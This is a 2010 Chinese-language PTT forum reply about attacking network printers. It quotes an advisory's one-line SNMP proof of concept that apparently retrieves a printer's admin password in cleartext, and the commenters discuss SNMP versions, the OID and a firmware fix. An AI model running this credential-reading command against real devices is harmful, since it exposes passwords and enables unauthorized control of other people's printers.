作者ANDR0ID (T-Mobile G1)
看板Soft_Job
標題Re: [心得] Hacking Network Printers
時間Wed Feb 3 02:57:05 2010
※ 引述《wrltertnna (小妹)》之銘言:
: 網管注意了~linux不是最安全的~
: http://www.irongeek.com/i.php?page=security/networkprinterhacking
http://www.securityfocus.com/bid/7001/exploit
上面其實寫的很明白
The following proof of concept was supplied:
C:\>snmputil get example.printer public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
看起來是 SNMP 直接就吐明碼的帳號密碼了呀.....
然後有密碼就可以進去惡搞了...
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 220.132.92.38
推 clanguage:snmp 第三版就支援加密了, 已經出很久了 02/03 12:34
推 wrltertnna:push 02/03 14:53
推 luciferii:這跟 SNMP v3 有沒有加密沒有關係... 02/03 16:32
推 leicheong:.1.3.6.1.4.1.11.2.3.9.1.1.2.3 是human intervention 02/04 19:51
→ leicheong:的OID... 我在想這指令其實是不是把目前連線的登入用戶 02/04 19:53
→ leicheong:輸入的密碼列出來... :O 02/04 19:54
→ leicheong:不過有這想法一直walk下去也的確夠意思的... 02/04 19:55
推 leicheong:btw, 這其實是2002年的東西了... 02/04 21:09
→ leicheong:修正方法是把firmware更新到X.22.09以下版本... 02/04 21:12